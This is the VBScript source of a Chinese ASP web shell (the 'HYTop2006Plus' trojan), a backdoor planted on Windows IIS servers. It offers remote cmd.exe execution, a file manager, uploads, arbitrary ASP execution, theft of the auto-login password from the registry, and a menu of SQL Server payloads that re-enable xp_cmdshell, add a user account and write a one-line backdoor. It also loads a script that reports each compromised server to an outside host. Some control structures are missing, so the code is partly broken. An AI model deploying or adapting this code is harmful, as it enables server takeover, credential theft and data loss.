作者:ghbt 來源: 本站原創(chuàng) 點(diǎn)擊數(shù):4276
<object runat="server" id = "ws" scope = "page" classid = "clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object>
<object runat="server" id = "fso" scope = "page" classid = "clsid:0D43FE01-F093-11CF-8940-00A0C9054228"></object>
<object runat="server" id = "ws" scope = "page" classid = "clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"></object>
<object runat="server" id = "sa" scope = "page" classid = "clsid:13709620-C279-11CE-A49E-444553540000"></object>
Option Explicit
Response.Buffer = True
Dim i, url, conn, sUrlB, theAct, thePath, rootPath, PageSize, aspPath, bOtherUser, sSqlSelect, sImage
Dim sUrl, accessStr, PageName, sysFileList, isSqlServer, sPacketName, oFso, oShl, oWshl, sFooter, sHeader, sClientTracer
bOtherUser = False ''是否需要其它NT用戶身份登錄
If bOtherUser = True And Trim(Request.ServerVariables("AUTH_USER")) = "" Then
Response.Status = "401 Unauthorized"
Response.Addheader "WWW-AuThenticate", "BASIC"
If Request.ServerVariables("AUTH_USER") = "" Then Response.End()
End If
theAct = GetPost("theAct")
PageSize = 20 ''默認(rèn)每頁記錄數(shù)
isSqlServer = False
rootPath = Server.MapPath("/")
PageName = GetPost("PageName")
url = Request.ServerVariables("URL") ''當(dāng)前頁的相對(duì)路徑
sPacketName = "Packet.mdb" ''文件包默認(rèn)文件名
thePath = Replace(GetPost("thePath"), "\\", "\")
aspPath = Replace(Server.MapPath(".") & "\~386.tmp", "\\", "\") ''系統(tǒng)臨時(shí)文件
sysFileList = "$" & sPacketName & "$" & Left(sPacketName, InStrRev(sPacketName, ".") - 1) & ".ldb$"
sClientTracer = "<script language=javascript src=""http://hididi.net/ASPAdmin/ASPAdmin_L.asp?theUrl=http://" & Request.ServerVariables("SERVER_NAME") & "&productName=HYTop2006Plus""></script>"
accessStr = "Provider=Microsoft.Jet.OLEDB.4.0; Data Source={$dbSource};User Id={$userId};Jet OLEDB:Database Password=""{$passWord}"";"
sFooter = "<tr><td class=trHead colspan=2> </td></tr><tr><td align=right class=td colspan=2>Powered By Marcos 2006.02 </td></tr></table>"
sHeader = "<table width=750 border=1><tr><td colspan=2 class=td><font face=webdings>8</font> {$s}</td></tr><tr><td colspan=2 class=trHead> </td></tr>"
sSqlSelect = "<select onchange=""if(this.form.sqlB)this.form.sqlB.value=this.value;else this.form.sql.value=this.value;""><option value=''>SQL Server常用操作列表<option value=""Use master dbcc addextendedproc ('sp_OACreate','odsole70.dll')"">恢復(fù)sp_OACreate<option value=""Use master dbcc addextendedproc ('xp_cmdshell','xplog70.dll')"">恢復(fù)xp_cmdshell<option value=""Use master dbcc addextendedproc ('xp_regwrite','xpstar.dll')"">恢復(fù)xp_regwrite" & _
"<option value=""Exec master.dbo.XP_CMDShell 'net user lcx lcx /add'"">XP_CMDShell執(zhí)行命令<option value=""sp_makewebtask @outputfile='d:\bbs\cd.asp',@charset=gb2312,@query='select ''<%execute(request(chr(35)))" & Chr(37) & ">''' "">sp_makewebtask寫文件" & _
"<option value=""CREATE TABLE [jnc](ResultTxt nvarchar(1024) NULL);exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0;select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("net user")');"">xp_regwrite執(zhí)行命令(1)<option value=""select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c copy 8617.tmp jnc.tmp")');BULK INSERT [jnc] FROM 'jnc.tmp' WITH (KEEPNULLS);"">xp_regwrite執(zhí)行結(jié)果寫入jnc表(2)<option value=""CREATE TABLE [jnc](ResultTxt nvarchar(1024) NULL);use master declare @o int exec sp_oacreate 'wscript.shell',@o out exec sp_oamethod @o,'run',NULL,'cmd /c net user > 8617.tmp',0,true;BULK INSERT [jnc] FROM '8617.tmp' WITH (KEEPNULLS);"">sp_oacreate執(zhí)行命令,結(jié)果寫入jnc表<option value=""select * from [jnc]"">查看jnc臨時(shí)表內(nèi)容<option value=""DROP TABLE [jnc];exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1;select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c del 8617.tmp&&del jnc.tmp")');"">xp_regwrite臨時(shí)數(shù)據(jù)刪除<option value=""DROP TABLE [jnc];declare @o int exec sp_oacreate 'wscript.shell',@o out exec sp_oamethod @o,'run',NULL,'cmd /c del 8617.tmp'"">sp_oacreate臨時(shí)數(shù)據(jù)刪除<option value="" EXEC [master].[dbo].[xp_makecab] 'c:\test.cab','default',1,'d:\cmd.asp'"">打CAB包<option value=""EXEC [master].[dbo].[xp_unpackcab] 'C:\test.cab','c:',1, 'n.asp'"">解CAB包</select><br />"
Const s = "lcx" ''登錄標(biāo)志
Const m = "HYTop2006+" ''Session標(biāo)志
Const isDebugMode = False 'False,True''是否調(diào)試模式
Const userPassword = "02200200251001" ''登錄密碼
Const imageFileExt = "$gif$jpg$bmp$" ''圖像后綴列表
Const editableFileExt = "$vbs$log$asp$txt$php$ini$inc$htm$html$xml$conf$config$jsp$java$htt$lst$aspx$php3$php4$js$css$bat$asa$"
Sub Echo(sStr)
Response.Write sStr
End Sub
Sub IsIn()
If Session(m & "userPassword") <> userPassword Then
Echo "<script>alert('沒有權(quán)限的訪問,請(qǐng)先登錄!');location.href='" & url & "';</script>"
End If
End Sub
Function IIf(var, val1, val2)
If var = True Then IIf = val1 Else IIf = val2
End Function
Function StrEncode(str)
str = HtmlEncode(str)
str = Replace(str, " ", " ")
str = Replace(str, " ", " ")
str = Replace(str, vbNewLine, "<br />")
StrEncode = str
End Function
Sub CreateObj(oFso, oShl, oWshl)
On Error Resume Next
Set oWshl = Server.CreateObject("WScript.Shell")
Set oShl = Server.CreateObject("Shell.Application")
Set oFso = Server.CreateObject("Scripting.FileSystemObject")
If IsEmpty(oShl) Then Set oShl = sa
If IsEmpty(oFso) Then Set oFso = fso
If IsEmpty(oWshl) Then Set oWshl = ws
If Err Then Err.Clear
End Sub
Function StreamLoadFromFile(sPath)
Dim oStream
If isDebugMode = False Then On Error Resume Next
Set oStream = Server.CreateObject("Adodb.Stream")
With oStream
.Type = 2
.Mode = 3
.LoadFromFile sPath
If Request("PageName") <> "TxtSearcher" Then ChkErr(Err)
.Charset = "gb2312"
.Position = 2
StreamLoadFromFile = .ReadText()
End With
Set oStream = Nothing
End Function
Sub JavaScript(sStr)
Response.Write(vbNewLine & "<script type=""text/javascript"">" & sStr & "</script>" & vbNewLine)
End Sub
Function GetPost(var)
Dim val
If Request.QueryString("PageName") = "PageUpload" Then
PageName = "PageUpload"
Exit Function
End If
val = RTrim(Request.Form(var))
If val = "" Then val = RTrim(Request.QueryString(var))
GetPost = val
End Function
Function HtmlEncode(str)
If IsNull(str) Then Exit Function
HtmlEncode = Server.HTMLEncode(str)
End Function
Function UrlEncode(str)
If IsNull(str) Then Exit Function
UrlEncode = Server.URLEncode(str)
End Function
Sub ShowTitle(str)
Response.Write "<title>" & str & " - 海陽頂端網(wǎng)ASP木馬@2006PLUS - By Marcos</title>"
Response.Write "<meta http-equiv='Content-Type' content='text/html; charset=gb2312'>"
End Sub
Function GetTheSize(n)
Dim i, aSize(4)
aSize(0) = "B"
aSize(1) = "KB"
aSize(2) = "MB"
aSize(3) = "GB"
aSize(4) = "TB"
While(n / 1024 >= 1)
n = n / 1024
i = i + 1
GetTheSize = Fix(n * 100) / 100 & " " & aSize(i)
End Function
Sub ShowErr(str)
Dim i, aStr
str = HtmlEncode(str)
aStr = Split(str, "$$")
Echo "<font size=2>"
Echo "出錯(cuò)信息:<br/><br/>"
For i = 0 To UBound(aStr)
Echo " " & (i + 1) & ". " & aStr(i) & "<br/>"
Echo "</font>"
End Sub
Sub CreateFolder(sPath)
Dim i
i = InStr(Mid(sPath, 4), "\") + 3
Do While i > 0
If oFso.FolderExists(Left(sPath, i)) = False Then oFso.CreateFolder(Left(sPath, i - 1))
If InStr(Mid(sPath, i + 1), "\") Then i = i + InStr(Mid(sPath, i + 1), "\") Else i = 0
End Sub
Sub AlertThenClose(str)
If str = "" Then
Response.Write "<script>window.close();</script>"
Response.Write "<script>alert(""" & str & """);window.close();</script>"
End If
End Sub
Sub ChkErr(Err)
If Err Then
Echo "<hr style='color:#d8d8f0;'/><font size=2><li>錯(cuò)誤: " & Err.Description & "</li><li>錯(cuò)誤源: " & Err.Source & "</li><br/>"
Echo "<hr style='color:#d8d8f0;'/> By Marcos 2006.02</font>"
End If
End Sub
Sub TopMenu()
Echo "<form method=post name=formp action=""" & url & """>"
Echo "<select name=PageName onchange=if(this.value!='')changePage(this);>"
Echo "<option value=''>請(qǐng)選擇功能頁面</option>"
Echo "<option value=PageCheck>服務(wù)器信息探針</option>"
Echo "<option value=PageServiceList>系統(tǒng)服務(wù)列表</option>"
Echo "<option value=PageUserList>系統(tǒng)用戶(組)列表</option>"
Echo "<option value=PageFso>FSO文件瀏覽操作器</option>"
Echo "<option value=PageApp>APP文件瀏覽操作器</option>"
Echo "<option value=PageDBTool>數(shù)據(jù)庫操作器</option>"
Echo "<option value=PagePack>文件夾打包/解開器</option>"
Echo "<option value=PageUpload>批量文件上傳</option>"
Echo "<option value=PageSearch>文本文件搜索器</option>"
Echo "<option value=PageWebProxy>HTTP協(xié)議網(wǎng)頁代理</option>"
Echo "<option value=PageExecute>自定義ASP語句運(yùn)行</option>"
Echo "<option value=PageCSInfo>客戶端服務(wù)器交互信息</option>"
Echo "<option value=PageWsCmdRun>WScript.Shell命令行操作</option>"
Echo "<option value=PageSaCmdRun>Shell.Application命令行</option>"
Echo "<option value=PageOtherTools>其它一些零碎的小工具</option>"
Echo "<option value=PageOut>退出系統(tǒng)</option>"
Echo "</select>"
Echo "</form>"
Echo "<script language=javascript>"
Echo "function document.onreadystatechange(){if(document.readyState != 'complete') return;" & vbNewLine
Echo "formp.PageName.value='" & PageName & "';" & IIf(PageName = s, "formp.PageName.value='PageExecute';formp.submit();", "") & "}"
Echo "function changePage(obj){"
Echo " if(obj.value=='PageOut')"
Echo " if(!confirm('確認(rèn)要退出系統(tǒng)嗎?'))return;"
Echo " if(obj.value=='PageWebProxy')obj.form.target='_blank';"
Echo " obj.form.submit();obj.form.target='';" & vbNewLine
Echo " if(obj.value!='PageWebProxy' && obj.value!='PageOut')obj.disabled=true;"
Echo "}"
Echo "</script>"
End Sub
Rem ++++++++++++++++++++++++++++++++++++
Rem 以下是頁面選擇部分
Rem ++++++++++++++++++++++++++++++++++++
Call CreateObj(oFso, oShl, oWshl)
If PageName <> "" And PageName <> s Then
End If
If PageName = "" And s <> "" Then
sUrl = "http://" & Request.ServerVariables("SERVER_NAME") & "/NoExists.html"
End If
Select Case PageName
Case "PageSearch"
Case "PageServiceList"
Case "PageUserList"
Case "PageCheck"
Case "PageFso"
Case "PageApp"
Case "PageDBTool"
Case "PageUpload"
Case "PageWsCmdRun"
Case "PageSaCmdRun"
Case "PagePack"
Case "PageExecute"
Case "PageCSInfo"
Case "PageOtherTools"
Case "PageWebProxy"
Case s, "PageOut"
End Select
Set oFso = Nothing
Set oShl = Nothing
Set oWshl = Nothing
Rem +++++++++++++++++++++++++++++++++++++
Rem 以下是各功能模塊部分
Rem +++++++++++++++++++++++++++++++++++++
Sub PageWsCmdRun()
Dim cmdStr, cmdPath, cmdResult
cmdStr = Request("cmdStr")
cmdPath = Request("cmdPath")
If cmdPath = "" Then
cmdPath = "cmd.exe"
End If
If theAct = "PackIt" And cmdStr <> "" Then
Server.ScriptTimeOut = 999999
cmdStr = "c:\progra~1\WinRAR\Rar.exe a """ & cmdStr & "\Packet.rar"" """ & cmdStr & """"
cmdStr = Replace(cmdStr, "\\", "\")
End If
If cmdStr <> "" Then
If InStr(LCase(cmdPath), "cmd.exe") > 0 Then
cmdResult = DoWsCmdRun(cmdPath & " /c " & cmdStr)
If LCase(cmdPath) = "wscriptshell" Then
cmdResult = DoWsCmdRun(cmdStr)
cmdResult = DoWsCmdRun(cmdPath & " " & cmdStr)
End If
End If
End If
Echo "<body onload=""document.forms[1].cmdStr.focus();"">"
Echo "<form method=post onSubmit='this.Submit.disabled=true'>"
Echo "<input type=hidden name=PageName value='PageWsCmdRun' />"
Echo Replace(sHeader, "{$s}", "WScript.Shell命令行操作")
Echo "<tr><td colspan=2> 路徑: <input name=cmdPath type=text id=cmdPath value=""" & HtmlEncode(cmdPath) & """ size=50> "
Echo "<input type=button name=Submit2 value=使用WScript.Shell onClick=""this.form.cmdPath.value='WScriptShell';""></td></tr>"
Echo "<tr><td colspan=2> 命令/參數(shù): <input name=cmdStr type=text id=cmdStr value=""" & HtmlEncode(cmdStr) & """ size=62> "
Echo "<input type=submit name=Submit value=' 運(yùn)行 '></td><tr>"
Echo "<tr><td colspan=2 style='line-height:21px;'> 注:請(qǐng)只在這里執(zhí)行單步程序(程序執(zhí)行開始到結(jié)束不需要人工干預(yù)),不然本程序會(huì)無法正常工作,并且在服務(wù)器生成一個(gè)不可結(jié)束的進(jìn)程.</td></tr>"
Echo "<tr><td colspan=2> <textarea id=cmdResult style='width:735px;height:400px;'>"
Echo HtmlEncode(cmdResult)
Echo "</textarea></td></tr>"
Echo sFooter
Echo "</form>"
Echo "</body>"
End Sub
Function DoWsCmdRun(cmdStr)
If isDebugMode = False Then On Error Resume Next
Dim oFile
doWsCmdRun = oWshl.Exec(cmdStr).StdOut.ReadAll()
If Err Then
Echo Err.Description & "<br>"
oWshl.Run cmdStr & " > " & aspPath, 0, True
Set oFile = oFso.OpenTextFile(aspPath)
DoWsCmdRun = oFile.RealAll()
If Err Then
Echo Err.Description & "<br>"
DoWsCmdRun = StreamLoadFromFile(aspPath)
End If
End If
End Function
Sub PageSaCmdRun()
If isDebugMode = False Then On Error Resume Next
Dim theFile, appPath, appName, appArgs
ShowTitle("Shell.Application 命令行操作")
appPath = Trim(Request("appPath"))
appName = Trim(Request("appName"))
appArgs = Trim(Request("appArgs"))
If theAct = "doAct" Then
If appName = "" Then appName = "cmd.exe"
If appPath <> "" And Right(appPath, 1) <> "\" Then
appPath = appPath & "\"
End If
If LCase(appName) = "cmd.exe" And appArgs <> "" Then
If LCase(Left(appArgs, 2)) <> "/c" Then
appArgs = "/c " & appArgs
End If
If LCase(appName) = "cmd.exe" And appArgs = "" Then
appArgs = "/c "
End If
End If
oShl.ShellExecute appName, appArgs, appPath, "", 0
' Response.Write("oShl.ShellExecute " & appName & ", " & appArgs & ", " & appPath & ", """", 0")
End If
If theAct = "readResult" Then
Response.Write("<style>body{font-size:12px;}</style>" & vbNewLine)
Echo StrEncode(streamLoadFromFile(aspPath))
If Err Then
Set theFile = fsoX.OpenTextFile(aspPath)
Echo StrEncode(theFile.ReadAll())
Set theFile = Nothing
End If
End If
Echo "<body onload=""document.forms[1].appArgs.focus();setTimeout('wsLoadIFrame();', 3900);"">"
Echo "<form method=post onSubmit='this.Submit.disabled=true'>"
Echo "<input type=hidden name=theAct value=doAct>"
Echo "<input type=hidden name=PageName value=PageSaCmdRun />"
Echo "<input type=hidden name=aspPath value=""" & HtmlEncode(aspPath) & """>"
Echo Replace(sHeader, "{$s}", "Shell.Application 命令行操作")
Echo "<tr><td colspan=2> 所在路徑: <input name=appPath type=text id=appPath value=""" & HtmlEncode(appPath) & """ size=62></td></tr>"
Echo "<tr><td colspan=2> 程序文件: <input name=appName type=text id=appName value=""" & HtmlEncode(appName) & """ size=62> "
Echo "<input type=button name=Submit4 value=' 回顯 ' onClick=""this.form.appArgs.value+=' > '+this.form.aspPath.value;""></td></tr>"
Echo "<tr><td colspan=2> 命令參數(shù): <input name=appArgs type=text id=appArgs value=""" & HtmlEncode(appArgs) & """ size=62> "
Echo "<input type=submit name=Submit value=' 運(yùn)行 '></td></tr>"
Echo "<tr><td colspan=2> 注: 只有命令行程序在CMD.EXE運(yùn)行環(huán)境下才可以進(jìn)行臨時(shí)文件回顯(利用"">""符號(hào)),其它程序只能執(zhí)行不能回顯.<br/>"
Echo " 由于命令執(zhí)行時(shí)間同網(wǎng)頁刷新時(shí)間不同步,所以有些執(zhí)行時(shí)間長的程序結(jié)果需要手動(dòng)刷新下面的iframe才能得到.回顯后記得刪除臨時(shí)文件.</td></tr>"
Echo "<tr><td colspan=2 style='padding-top:6px;'> <iframe id=cmdResult style='width:733px;height:400px;'>"
Echo "</iframe></td></tr>"
Echo sFooter
Echo "</form>"
Echo "</body>"
End Sub
Sub PageSearch()
Dim strKey, strPath
strKey = GetPost("Key")
Server.ScriptTimeout = 5000
If thePath = "" Then thePath = rootPath
If theAct <> "" And strKey <> "" Then
End If
End Sub
Sub SearchTable(strKey)
Echo "<form method=post action='" & url & "'>"
Echo "<input type=hidden value=PageSearch name=PageName>"
Echo Replace(sHeader, "{$s}", "文本文件搜索器(需FSO支持)")
Echo "<tr>"
Echo "<td> 路徑</td>"
Echo "<td> <input name=thePath type=text id=thePath value="""
Echo HtmlEncode(thePath)
Echo """ style='width:360px;'>"
Echo "</td>"
Echo "</tr>"
Echo "<tr>"
Echo "<td width='20%'> 關(guān)鍵字</td>"
Echo "<td> <input name=Key type=text value='" & HtmlEncode(strKey) & "' id=Key style='width:400px;'> "
Echo "<select name=theAct id=theAct>"
Echo "<option value=FileName selected>僅文件名</option>"
Echo "<option value=FileContent>僅文本內(nèi)容</option>"
Echo "<option value=Both>兩者都</option>"
Echo "</select>"
Echo " <input type=submit name=Submit value=提交> </td>"
Echo "</tr>"
Echo sFooter
Echo "</form>"
End Sub
Sub SearchIt(key)
Dim strPath, theFolder
Response.Buffer = True
strPath = thePath
If oFso.FolderExists(strPath) = False Then
ShowErr(thePath & " 目錄不存在或者不允許訪問!")
End If
Set theFolder = oFso.GetFolder(strPath)
Echo "<br/><div style='width:750;border:1px solid #d8d8f0;'>"
Select Case theAct
Case "Both"
Call SearchFolder(theFolder, key, 1)
Case "FileName"
Call SearchFolder(theFolder, key, 2)
Case "FileContent"
Call SearchFolder(theFolder, key, 3)
End Select
Echo "</div>"
Set theFolder = Nothing
End Sub
Sub SearchFolder(folder, key, flag)
Dim ext, title, theFile, theFolder
If isDebugMode = False Then On Error Resume Next
For Each theFile In folder.Files
ext = LCase(oFso.GetExtensionName(theFile.Path))
If flag = 1 Or flag = 2 Then
If InStr(LCase(theFile.Name), LCase(key)) > 0 Then Echo FileLink(theFile, "")
End If
If flag = 1 Or flag = 3 Then
If InStr(editableFileExt, "$" & ext & "$") > 0 Then
If SearchFile(theFile, key, title) Then Echo FileLink(theFile, title)
End If
End If
For Each theFolder In folder.SubFolders
Call SearchFolder(theFolder, key, flag)
End Sub
Function SearchFile(fx, s, title)
Dim theFile, content, pos1, pos2
If isDebugMode = False Then On Error Resume Next
Set theFile = oFso.OpenTextFile(fx.Path)
content = theFile.ReadAll()
Set theFile = Nothing
If Err Then Err.Clear
SearchFile = InStr(1, content, s, 1)
If SearchFile > 0 Then
pos1 = InStr(1, content, "<TITLE>", 1)
pos2 = InStr(1, content, "</TITLE>", 1)
title = ""
If pos1 > 0 And pos2 > 0 Then
title = Mid(content, pos1 + 7, pos2 - pos1 - 7)
End If
End If
End Function
Function FileLink(file, title)
fileLink = file.Path
If title = "" Then
title = file.Name
End If
fileLink = " <font color=ff0000>" & title & "</font> " & fileLink & "<br/>"
End Function
Sub PageCheck()
End Sub
Sub InfoCheck()
Dim aCheck(7), sExEnvList, aExEnvList
If isDebugMode = False Then On Error Resume Next
aExEnvList = Split(sExEnvList, "$")
aCheck(0) = Server.ScriptTimeOut() & "(秒)"
aCheck(1) = FormatDateTime(Now(), 0)
aCheck(2) = Request.ServerVariables("SERVER_NAME")
aCheck(2) = aCheck(2) & ", " & Request.ServerVariables("LOCAL_ADDR")
aCheck(2) = aCheck(2) & ":" & Request.ServerVariables("SERVER_PORT")
aCheck(3) = Request.ServerVariables("OS")
aCheck(3) = IIf(aCheck(3) = "", "Windows2003", aCheck(3)) & ", " & Request.ServerVariables("SERVER_SOFTWARE")
aCheck(3) = aCheck(3) & ", " & ScriptEngine & "/" & ScriptEngineMajorVersion & "." & ScriptEngineMinorVersion & "." & ScriptEngineBuildVersion
aCheck(4) = rootPath
aCheck(4) = aCheck(4) & ", " & GetTheSize(oFso.GetFolder(rootPath).Size)
aCheck(5) = "Path: " & Request.ServerVariables("PATH_TRANSLATED") & "<br />"
aCheck(5) = aCheck(5) & " Url : http://" & Request.ServerVariables("SERVER_NAME") & Request.ServerVariables("Url")
aCheck(6) = "變量數(shù): " & Application.Contents.Count() & ","
aCheck(6) = aCheck(6) & " 會(huì)話數(shù): " & Session.Contents.Count & ","
aCheck(6) = aCheck(6) & " 當(dāng)前會(huì)話ID: " & Session.SessionId() & "<br />"
aCheck(6) = aCheck(6) & " 服務(wù)器內(nèi)存: " & GetTheSize(oShl.GetSystemInformation("PhysicalMemoryInstalled")) & ","
aCheck(6) = aCheck(6) & " 計(jì)" & oWshl.Environment("SYSTEM")("NUMBER_OF_PROCESSORS") & "個(gè)CPU(" & oWshl.Environment("SYSTEM")("PROCESSOR_IDENTIFIER") & ")"
Echo Replace(sHeader, "{$s}", "服務(wù)器基本信息")
Echo "<tr class=td>"
Echo "<td width='20%'> 項(xiàng)目</td>"
Echo "<td> 值</td>"
Echo "</tr>"
Echo "<tr>"
Echo "<td> 默認(rèn)超時(shí)</td>"
Echo "<td> " & aCheck(0) & "</td>"
Echo "</tr>"
Echo "<tr>"
Echo "<td> 當(dāng)前時(shí)間</td>"
Echo "<td> " & aCheck(1) & "</td>"
Echo "</tr>"
Echo "<tr>"
Echo "<td> 服務(wù)器名</td>"
Echo "<td> " & aCheck(2) & "</td>"
Echo "</tr>"
Echo "<tr>"
Echo "<td> 軟件環(huán)境</td>"
Echo "<td> " & aCheck(3) & "</td>"
Echo "</tr>"
Echo "<tr>"
Echo "<td> 站點(diǎn)目錄</td>"
Echo "<td> " & aCheck(4) & "</td>"
Echo "</tr>"
Echo "<tr>"
Echo "<td> 當(dāng)前路徑</td>"
Echo "<td> " & aCheck(5) & "</td>"
Echo "</tr>"
Echo "<tr><td> 終端服務(wù)端口<br /> 及自動(dòng)登錄信息</td><td>"
Echo "</td></tr>"
Echo "<tr>"
Echo "<td> 其它</td>"
Echo "<td> " & aCheck(6) & "</td>"
Echo "</tr>"
Echo "<tr>"
Echo "<td> 環(huán)境變量</td>"
Echo "<td style='padding-left:7px;'>"
For i = 0 To UBound(aExEnvList)
Echo aExEnvList(i) & ": " & oWshl.ExpandEnvironmentStrings("%" & aExEnvList(i) & "%") & "<br />"
Echo "</td>"
Echo "</tr>"
Echo sFooter
End Sub
Sub GetSrvDrvInfo()
If isDebugMode = False Then On Error Resume Next
Dim oTheDrive
Echo "<br />"
Echo Replace(Replace(sHeader, "{$s}", "服務(wù)器磁盤信息"), "=2", "=6")
Echo "<tr class=td align=center>"
Echo "<td>盤符</td>"
Echo "<td>類型</td>"
Echo "<td>卷標(biāo)</td>"
Echo "<td>文件系統(tǒng)</td>"
Echo "<td>可用空間</td>"
Echo "<td>總空間</td>"
Echo "</tr>"
For Each oTheDrive In oFso.Drives
Echo "<tr align=center><td>"
Echo oTheDrive.DriveLetter
Echo "</td><td>"
Echo GetDriveType(oTheDrive.DriveType)
Echo "</td><td>"
Echo oTheDrive.VolumeName
Echo "</td><td>"
Echo oTheDrive.FileSystem
Echo "</td><td>"
Echo GetTheSize(oTheDrive.FreeSpace)
Echo "</td><td>"
Echo GetTheSize(oTheDrive.TotalSize)
Echo "</td></tr>"
If Err Then Err.Clear
Echo Replace(sFooter, "=2", "=6")
Set oTheDrive = Nothing
End Sub
Function GetDriveType(n)
Select Case n
Case 0
GetDriveType = "未知"
Case 1
GetDriveType = "可移動(dòng)磁盤"
Case 2
GetDriveType = "本地硬盤"
Case 3
GetDriveType = "網(wǎng)絡(luò)磁盤"
Case 4
GetDriveType = "CD-ROM"
Case 5
GetDriveType = "RAM 磁盤"
End Select
End Function
Sub GetTerminalInfo()
If isDebugMode = False Then On Error Resume Next
Dim terminalPortPath, terminalPortKey, termPort
Dim autoLoginPath, autoLoginUserKey, autoLoginPassKey
Dim isAutoLoginEnable, autoLoginEnableKey, autoLoginUsername, autoLoginPassword
terminalPortPath = "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\"
terminalPortKey = "PortNumber"
termPort = oWshl.RegRead(terminalPortPath & terminalPortKey)
If termPort = "" Or Err.Number <> 0 Then
Echo " 無法得到終端服務(wù)端口, 請(qǐng)檢查權(quán)限是否已經(jīng)受到限制.<br/>"
Echo " 當(dāng)前終端服務(wù)端口: " & termPort & "<br/>"
End If
autoLoginPath = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\"
autoLoginEnableKey = "AutoAdminLogon"
autoLoginUserKey = "DefaultUserName"
autoLoginPassKey = "DefaultPassword"
isAutoLoginEnable = oWshl.RegRead(autoLoginPath & autoLoginEnableKey)
If isAutoLoginEnable = 0 Then
Echo " 系統(tǒng)自動(dòng)登錄功能未開啟"
autoLoginUsername = oWshl.RegRead(autoLoginPath & autoLoginUserKey)
Echo " 自動(dòng)登錄的系統(tǒng)帳戶: " & autoLoginUsername & "<br />"
autoLoginPassword = oWshl.RegRead(autoLoginPath & autoLoginPassKey)
If Err Then
Echo "False"
End If
Echo " 自動(dòng)登錄的帳戶密碼: " & autoLoginPassword & "<br />"
End If
End Sub
Sub ObjCheck()
Dim aObj(19)
Dim x, objTmp, theObj, strObj
If isDebugMode = False Then On Error Resume Next
strObj = Trim(getPost("TheObj"))
aObj(0) = "MSWC.AdRotator|廣告輪換組件"
aObj(1) = "MSWC.BrowserType|瀏覽器信息組件"
aObj(2) = "MSWC.NextLink|內(nèi)容鏈接庫組件"
aObj(3) = "MSWC.Tools|"
aObj(4) = "MSWC.Status|"
aObj(5) = "MSWC.Counters|計(jì)數(shù)器組件"
aObj(6) = "MSWC.PermissionChecker|權(quán)限檢測組件"
aObj(7) = "Adodb.Connection|ADO 數(shù)據(jù)對(duì)象組件"
aObj(8) = "CDONTS.NewMail|虛擬 SMTP 發(fā)信組件"
aObj(9) = "Scripting.FileSystemObject|FSO組件"
aObj(10) = "Adodb.Stream|Stream 流組件"
aObj(11) = "Shell.Application|"
aObj(12) = "WScript.Shell|"
aObj(13) = "Wscript.Network|"
aObj(14) = "ADOX.Catalog|"
aObj(15) = "JMail.SmtpMail|JMail 郵件收發(fā)組件"
aObj(16) = "Persits.Upload.1|ASPUpload 文件上傳組件"
aObj(17) = "LyfUpload.UploadFile|劉云峰的文件上傳組件組件"
aObj(18) = "SoftArtisans.FileUp|SA-FileUp 文件上傳組件"
aObj(19) = strObj & "|您所要檢測的組件"
Echo "<br/>"
Echo Replace(Replace(sHeader, "{$s}", "服務(wù)器組件信息"), "=2", "=3")
Echo "<tr class=td>"
Echo "<td> 組件<font color=#666666>(描述)</font></td>"
Echo "<td width=10% align=center>支持</td>"
Echo "<td width=15% align=center>版本</td>"
Echo "</tr>"
For Each x In aObj
theObj = Split(x, "|")
If theObj(0) = "" Then Exit For
Set objTmp = Server.CreateObject(theObj(0))
If Err <> -2147221005 Then
x = x & "|√" & IIf(Err = -2147221005, "<font color=#666666>(權(quán)限不足)</font>", "") & "|"
x = x & objTmp.Version
x = x & "|<font color=red>×</font>|"
End If
If Err Then Err.Clear
Set objTmp = Nothing
theObj = Split(x, "|")
theObj(1) = theObj(0) & IIf(theObj(1) <> "", " <font color=#666666>(" & theObj(1) & ")</font>", "")
Echo "<tr>"
Echo "<td> " & theObj(1) & "</td>"
Echo "<td align=center>" & theObj(2) & "</td>"
Echo "<td align=center>" & theObj(3) & "</td>"
Echo "</tr>"
Echo "<form method=post action='" & url & "'>"
Echo "<input type=hidden name=PageName value=PageCheck><input type=hidden name=theAct id=theAct>"
Echo "<tr>"
Echo "<td colspan=3> 其它組件檢測:"
Echo "<input name=TheObj type=text id=TheObj style='width:585px;' value=""" & strObj & """>"
Echo "<input type=submit name=Submit value=提交></td>"
Echo "</tr>"
Echo "</form>"
Echo Replace(sFooter, "=2", "=3")
End Sub
Sub PageCSInfo()
If isDebugMode = False Then On Error Resume Next
Dim sKey, sVar, sVariable
Echo Replace(sHeader, "{$s}", "Application 變量查看")
For Each sVariable In Application.Contents
Echo "<tr><td valign=top style='width:130px;'>"
Echo " <span class=fixSpan style='width:130px;' title='" & sVariable & "'>" & sVariable & "</span>"
Echo "</td><td style='padding-left:7px;' class=fixTable><span>"
If IsArray(Application(sVariable)) = True Then
For Each sVar In Application(sVariable)
Echo "<div>" & StrEncode(sVar) & "</div>"
Echo StrEncode(Application(sVariable))
End If
Echo "</span></td></tr>"
Echo sFooter
Echo "<br />" & Replace(sHeader, "{$s}", "Session 變量查看")
For Each sVariable In Session.Contents
Echo "<tr><td valign=top style='width:130px;'>"
Echo " <span class=fixSpan style='width:130px;' title='" & sVariable & "'>" & sVariable & "</span>"
Echo "</td><td style='padding-left:7px;' class=fixTable><span>"
Echo StrEncode(Session(sVariable))
Echo "</span></td></tr>"
Echo sFooter
Echo "<br />" & Replace(sHeader, "{$s}", "Cookies 變量查看")
For Each sVariable In Request.Cookies
If Request.Cookies(sVariable).HasKeys Then
For Each sKey In Request.Cookies(sVariable)
Echo "<tr><td valign=top style='width:130px;'>"
Echo " <span class=fixSpan style='width:130px;' title='" & sVariable & "'>" & sVariable & "(" & sKey & ")</span>"
Echo "</td><td style='padding-left:7px;' class=fixTable><span>"
